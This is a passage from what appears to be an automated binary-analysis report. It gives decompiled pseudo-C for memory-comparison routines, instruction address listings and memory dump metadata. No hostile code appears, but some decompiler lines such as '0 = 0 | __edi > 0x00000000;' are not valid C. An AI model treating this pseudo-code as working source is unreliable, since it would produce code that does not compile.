								if( *(_t336 - 0xf) ==  *(_t294 - 0xf)) {
									_t246 = 0;
									L58:
									if(_t246 != 0) {
										goto L1;
									}
									_t202 =  *(_t336 - 0xb);
									if(_t202 ==  *(_t294 - 0xb)) {
										_t246 = 0;
										L69:
										if(_t246 != 0) {
											goto L1;
										}
										_t203 =  *(_t336 - 7);
										if(_t203 ==  *(_t294 - 7)) {
											_t246 = 0;
											L80:
											if(_t246 != 0) {
												goto L1;
											}
											_t297 = ( *(_t336 - 3) & 0x000000ff) - ( *(_t294 - 3) & 0x000000ff);
											if(_t297 == 0) {
												L83:
												_t299 = ( *(_t336 - 2) & 0x000000ff) - ( *(_t294 - 2) & 0x000000ff);
												if(_t299 == 0) {
													L3:
													_t246 = ( *(_t336 - 1) & 0x000000ff) - ( *(_t294 - 1) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t246 = (0 | _t299 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t246 = (0 | _t297 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t301 = (_t203 & 0x000000ff) - ( *(_t294 - 7) & 0x000000ff);
										if(_t301 == 0) {
											L73:
											_t303 = ( *(_t336 - 6) & 0x000000ff) - ( *(_t294 - 6) & 0x000000ff);
											if(_t303 == 0) {
												L75:
												_t305 = ( *(_t336 - 5) & 0x000000ff) - ( *(_t294 - 5) & 0x000000ff);
												if(_t305 == 0) {
													L77:
													_t246 = ( *(_t336 - 4) & 0x000000ff) - ( *(_t294 - 4) & 0x000000ff);
													if(_t246 != 0) {
														_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t246 = (0 | _t305 > 0x00000000) * 2 - 1;
												if(_t246 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t246 = (0 | _t303 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t246 = (0 | _t301 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t307 = (_t202 & 0x000000ff) - ( *(_t294 - 0xb) & 0x000000ff);
									if(_t307 == 0) {
										L62:
										_t309 = ( *(_t336 - 0xa) & 0x000000ff) - ( *(_t294 - 0xa) & 0x000000ff);
										if(_t309 == 0) {
											L64:
											_t311 = ( *(_t336 - 9) & 0x000000ff) - ( *(_t294 - 9) & 0x000000ff);
											if(_t311 == 0) {
												L66:
												_t246 = ( *(_t336 - 8) & 0x000000ff) - ( *(_t294 - 8) & 0x000000ff);
												if(_t246 != 0) {
													_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t246 = (0 | _t311 > 0x00000000) * 2 - 1;
											if(_t246 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t246 = (0 | _t309 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t246 = (0 | _t307 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t313 = ( *(_t336 - 0xf) & 0x000000ff) - ( *(_t294 - 0xf) & 0x000000ff);
								if(_t313 == 0) {
									L51:
									_t315 = ( *(_t336 - 0xe) & 0x000000ff) - ( *(_t294 - 0xe) & 0x000000ff);
									if(_t315 == 0) {
										L53:
										_t317 = ( *(_t336 - 0xd) & 0x000000ff) - ( *(_t294 - 0xd) & 0x000000ff);
										if(_t317 == 0) {
											L55:
											_t246 = ( *(_t336 - 0xc) & 0x000000ff) - ( *(_t294 - 0xc) & 0x000000ff);
											if(_t246 != 0) {
												_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t246 = (0 | _t317 > 0x00000000) * 2 - 1;
										if(_t246 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t246 = (0 | _t315 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t246 = (0 | _t313 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t319 = (_t200 & 0x000000ff) - ( *(_t294 - 0x13) & 0x000000ff);
							if(_t319 == 0) {
								L40:
								_t321 = ( *(_t336 - 0x12) & 0x000000ff) - ( *(_t294 - 0x12) & 0x000000ff);
								if(_t321 == 0) {
									L42:
									_t323 = ( *(_t336 - 0x11) & 0x000000ff) - ( *(_t294 - 0x11) & 0x000000ff);
									if(_t323 == 0) {
										L44:
										_t246 = ( *(_t336 - 0x10) & 0x000000ff) - ( *(_t294 - 0x10) & 0x000000ff);
										if(_t246 != 0) {
											_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t246 = (0 | _t323 > 0x00000000) * 2 - 1;
									if(_t246 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t246 = (0 | _t321 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t246 = (0 | _t319 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t325 = (_t199 & 0x000000ff) - ( *(_t294 - 0x17) & 0x000000ff);
						if(_t325 == 0) {
							L29:
							_t327 = ( *(_t336 - 0x16) & 0x000000ff) - ( *(_t294 - 0x16) & 0x000000ff);
							if(_t327 == 0) {
								L31:
								_t329 = ( *(_t336 - 0x15) & 0x000000ff) - ( *(_t294 - 0x15) & 0x000000ff);
								if(_t329 == 0) {
									L33:
									_t246 = ( *(_t336 - 0x14) & 0x000000ff) - ( *(_t294 - 0x14) & 0x000000ff);
									if(_t246 != 0) {
										_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t246 = (0 | _t329 > 0x00000000) * 2 - 1;
								if(_t246 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t246 = (0 | _t327 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t246 = (0 | _t325 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t331 = (_t198 & 0x000000ff) - ( *(_t294 - 0x1b) & 0x000000ff);
					if(_t331 == 0) {
						L18:
						_t333 = ( *(_t336 - 0x1a) & 0x000000ff) - ( *(_t294 - 0x1a) & 0x000000ff);
						if(_t333 == 0) {
							L20:
							_t335 = ( *(_t336 - 0x19) & 0x000000ff) - ( *(_t294 - 0x19) & 0x000000ff);
							if(_t335 == 0) {
								L22:
								_t246 = ( *(_t336 - 0x18) & 0x000000ff) - ( *(_t294 - 0x18) & 0x000000ff);
								if(_t246 != 0) {
									_t246 = (0 | _t246 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t246 = (0 | _t335 > 0x00000000) * 2 - 1;
							if(_t246 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t246 = (0 | _t333 > 0x00000000) * 2 - 1;
						if(_t246 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t246 = (0 | _t331 > 0x00000000) * 2 - 1;
					if(_t246 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi =  *(__esi - 0x1f) & 0x000000ff;
					__edi = ( *(__esi - 0x1f) & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                                        0x0106bd68
                                        0x0106bd68
                                        0x0106bd6e
                                        0x0106bdf6
                                        0x0106bdf8
                                        0x0106bdfa
                                        0x00000000
                                        0x00000000
                                        0x0106be00
                                        0x0106be06
                                        0x0106be8d
                                        0x0106be8f
                                        0x0106be91
                                        0x00000000
                                        0x00000000
                                        0x0106be97
                                        0x0106be9d
                                        0x0106bf24
                                        0x0106bf26
                                        0x0106bf28
                                        0x00000000
                                        0x00000000
                                        0x0106bf2e
                                        0x0106bf34
                                        0x0106bfbb
                                        0x0106bfbd
                                        0x0106bfbf
                                        0x00000000
                                        0x00000000
                                        0x0106bfcb
                                        0x0106c053
                                        0x0106c055
                                        0x0106c057
                                        0x00000000
                                        0x00000000
                                        0x0106c05d
                                        0x0106c063
                                        0x0106c0ea
                                        0x0106c0ec
                                        0x0106c0ee
                                        0x00000000
                                        0x00000000
                                        0x0106c0f4
                                        0x0106c0fa
                                        0x0106c181
                                        0x0106c183
                                        0x0106c185
                                        0x00000000
                                        0x00000000
                                        0x0106c193
                                        0x0106c195
                                        0x0106c1ad
                                        0x0106c1b5
                                        0x0106c1b7
                                        0x0106b910
                                        0x0106b918
                                        0x0106b91a
                                        0x0106b927
                                        0x0106b927
                                        0x00000000
                                        0x0106b91a
                                        0x0106c1c4
                                        0x0106b90a
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b90a
                                        0x0106c19e
                                        0x0106c1a7
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c1a7
                                        0x0106c107
                                        0x0106c109
                                        0x0106c121
                                        0x0106c129
                                        0x0106c12b
                                        0x0106c143
                                        0x0106c14b
                                        0x0106c14d
                                        0x0106c165
                                        0x0106c16d
                                        0x0106c16f
                                        0x0106c178
                                        0x0106c178
                                        0x00000000
                                        0x0106c16f
                                        0x0106c156
                                        0x0106c15f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c15f
                                        0x0106c134
                                        0x0106c13d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c13d
                                        0x0106c112
                                        0x0106c11b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c11b
                                        0x0106c070
                                        0x0106c072
                                        0x0106c08a
                                        0x0106c092
                                        0x0106c094
                                        0x0106c0ac
                                        0x0106c0b4
                                        0x0106c0b6
                                        0x0106c0ce
                                        0x0106c0d6
                                        0x0106c0d8
                                        0x0106c0e1
                                        0x0106c0e1
                                        0x00000000
                                        0x0106c0d8
                                        0x0106c0bf
                                        0x0106c0c8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c0c8
                                        0x0106c09d
                                        0x0106c0a6
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c0a6
                                        0x0106c07b
                                        0x0106c084
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c084
                                        0x0106bfd9
                                        0x0106bfdb
                                        0x0106bff3
                                        0x0106bffb
                                        0x0106bffd
                                        0x0106c015
                                        0x0106c01d
                                        0x0106c01f
                                        0x0106c037
                                        0x0106c03f
                                        0x0106c041
                                        0x0106c04a
                                        0x0106c04a
                                        0x00000000
                                        0x0106c041
                                        0x0106c028
                                        0x0106c031
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c031
                                        0x0106c006
                                        0x0106c00f
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106c00f
                                        0x0106bfe4
                                        0x0106bfed
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bfed
                                        0x0106bf41
                                        0x0106bf43
                                        0x0106bf5b
                                        0x0106bf63
                                        0x0106bf65
                                        0x0106bf7d
                                        0x0106bf85
                                        0x0106bf87
                                        0x0106bf9f
                                        0x0106bfa7
                                        0x0106bfa9
                                        0x0106bfb2
                                        0x0106bfb2
                                        0x00000000
                                        0x0106bfa9
                                        0x0106bf90
                                        0x0106bf99
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bf99
                                        0x0106bf6e
                                        0x0106bf77
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bf77
                                        0x0106bf4c
                                        0x0106bf55
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bf55
                                        0x0106beaa
                                        0x0106beac
                                        0x0106bec4
                                        0x0106becc
                                        0x0106bece
                                        0x0106bee6
                                        0x0106beee
                                        0x0106bef0
                                        0x0106bf08
                                        0x0106bf10
                                        0x0106bf12
                                        0x0106bf1b
                                        0x0106bf1b
                                        0x00000000
                                        0x0106bf12
                                        0x0106bef9
                                        0x0106bf02
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bf02
                                        0x0106bed7
                                        0x0106bee0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bee0
                                        0x0106beb5
                                        0x0106bebe
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bebe
                                        0x0106be13
                                        0x0106be15
                                        0x0106be2d
                                        0x0106be35
                                        0x0106be37
                                        0x0106be4f
                                        0x0106be57
                                        0x0106be59
                                        0x0106be71
                                        0x0106be79
                                        0x0106be7b
                                        0x0106be84
                                        0x0106be84
                                        0x00000000
                                        0x0106be7b
                                        0x0106be62
                                        0x0106be6b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106be6b
                                        0x0106be40
                                        0x0106be49
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106be49
                                        0x0106be1e
                                        0x0106be27
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bd74
                                        0x0106bd78
                                        0x0106bd7c
                                        0x0106bd7e
                                        0x0106bd96
                                        0x0106bd96
                                        0x0106bd9e
                                        0x0106bda0
                                        0x0106bdb8
                                        0x0106bdb8
                                        0x0106bdc0
                                        0x0106bdc2
                                        0x0106bdda
                                        0x0106bdda
                                        0x0106bde2
                                        0x0106bde4
                                        0x0106bded
                                        0x0106bded
                                        0x00000000
                                        0x0106bde4
                                        0x0106bdc8
                                        0x0106bdcb
                                        0x0106bdd4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bdd4
                                        0x0106bda6
                                        0x0106bda9
                                        0x0106bdb2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bdb2
                                        0x0106bd84
                                        0x0106bd87
                                        0x0106bd90
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106bd90
                                        0x0106b4f6
                                        0x0106b4f6
                                        0x0106c2e7

                                        Memory Dump Source
                                        • Source File: 00000000.00000002.648617428.0000000001061000.00000020.00020000.sdmp, Offset: 01060000, based on PE: true
                                        • Associated: 00000000.00000002.648614024.0000000001060000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648633690.0000000001078000.00000002.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648639932.000000000107E000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648644156.000000000107F000.00000040.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp Download File
                                        • Associated: 00000000.00000002.648684713.00000000010C2000.00000002.00020000.sdmp Download File
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction ID: be3ad18cb935d4c6894136cd4c1ce7f50391db08ed7bcf769d9b9b598d301080
                                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                        • Instruction Fuzzy Hash: E5C166763051934AEFAE463E857443FBEE95A926B131A079DD8F2CF1D6FE20C124D620
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0106B4FE, Relevance: .3, Instructions: 331COMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E0106B4FE(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                                        0x0106b4fe
                                        0x0106b4fe
                                        0x0106b504
                                        0x0106b57b
                                        0x0106b57d
                                        0x0106b57f
                                        0x00000000
                                        0x00000000
                                        0x0106b585
                                        0x0106b58b
                                        0x0106b612
                                        0x0106b614
                                        0x0106b616
                                        0x00000000
                                        0x00000000
                                        0x0106b61c
                                        0x0106b622
                                        0x0106b6a9
                                        0x0106b6ab
                                        0x0106b6ad
                                        0x00000000
                                        0x00000000
                                        0x0106b6b3
                                        0x0106b6b9
                                        0x0106b740
                                        0x0106b742
                                        0x0106b744
                                        0x00000000
                                        0x00000000
                                        0x0106b74a
                                        0x0106b750
                                        0x0106b7d7
                                        0x0106b7d9
                                        0x0106b7db
                                        0x00000000
                                        0x00000000
                                        0x0106b7e7
                                        0x0106b86f
                                        0x0106b871
                                        0x0106b873
                                        0x00000000
                                        0x00000000
                                        0x0106b879
                                        0x0106b87f
                                        0x0106b906
                                        0x0106b908
                                        0x0106b90a
                                        0x0106b918
                                        0x0106b91a
                                        0x0106b927
                                        0x0106b927
                                        0x0106b91a
                                        0x00000000
                                        0x0106b90a
                                        0x0106b88c
                                        0x0106b88e
                                        0x0106b8a6
                                        0x0106b8ae
                                        0x0106b8b0
                                        0x0106b8c8
                                        0x0106b8d0
                                        0x0106b8d2
                                        0x0106b8ea
                                        0x0106b8f2
                                        0x0106b8f4
                                        0x0106b8fd
                                        0x0106b8fd
                                        0x00000000
                                        0x0106b8f4
                                        0x0106b8db
                                        0x0106b8e4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b8e4
                                        0x0106b8b9
                                        0x0106b8c2
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b8c2
                                        0x0106b897
                                        0x0106b8a0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b8a0
                                        0x0106b7f5
                                        0x0106b7f7
                                        0x0106b80f
                                        0x0106b817
                                        0x0106b819
                                        0x0106b831
                                        0x0106b839
                                        0x0106b83b
                                        0x0106b853
                                        0x0106b85b
                                        0x0106b85d
                                        0x0106b866
                                        0x0106b866
                                        0x00000000
                                        0x0106b85d
                                        0x0106b844
                                        0x0106b84d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b84d
                                        0x0106b822
                                        0x0106b82b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b82b
                                        0x0106b800
                                        0x0106b809
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b809
                                        0x0106b75d
                                        0x0106b75f
                                        0x0106b777
                                        0x0106b77f
                                        0x0106b781
                                        0x0106b799
                                        0x0106b7a1
                                        0x0106b7a3
                                        0x0106b7bb
                                        0x0106b7c3
                                        0x0106b7c5
                                        0x0106b7ce
                                        0x0106b7ce
                                        0x00000000
                                        0x0106b7c5
                                        0x0106b7ac
                                        0x0106b7b5
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b7b5
                                        0x0106b78a
                                        0x0106b793
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b793
                                        0x0106b768
                                        0x0106b771
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b771
                                        0x0106b6c6
                                        0x0106b6c8
                                        0x0106b6e0
                                        0x0106b6e8
                                        0x0106b6ea
                                        0x0106b702
                                        0x0106b70a
                                        0x0106b70c
                                        0x0106b724
                                        0x0106b72c
                                        0x0106b72e
                                        0x0106b737
                                        0x0106b737
                                        0x00000000
                                        0x0106b72e
                                        0x0106b715
                                        0x0106b71e
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b71e
                                        0x0106b6f3
                                        0x0106b6fc
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b6fc
                                        0x0106b6d1
                                        0x0106b6da
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0106b6da
                                        0x0106b62f
                                        0x0106b631
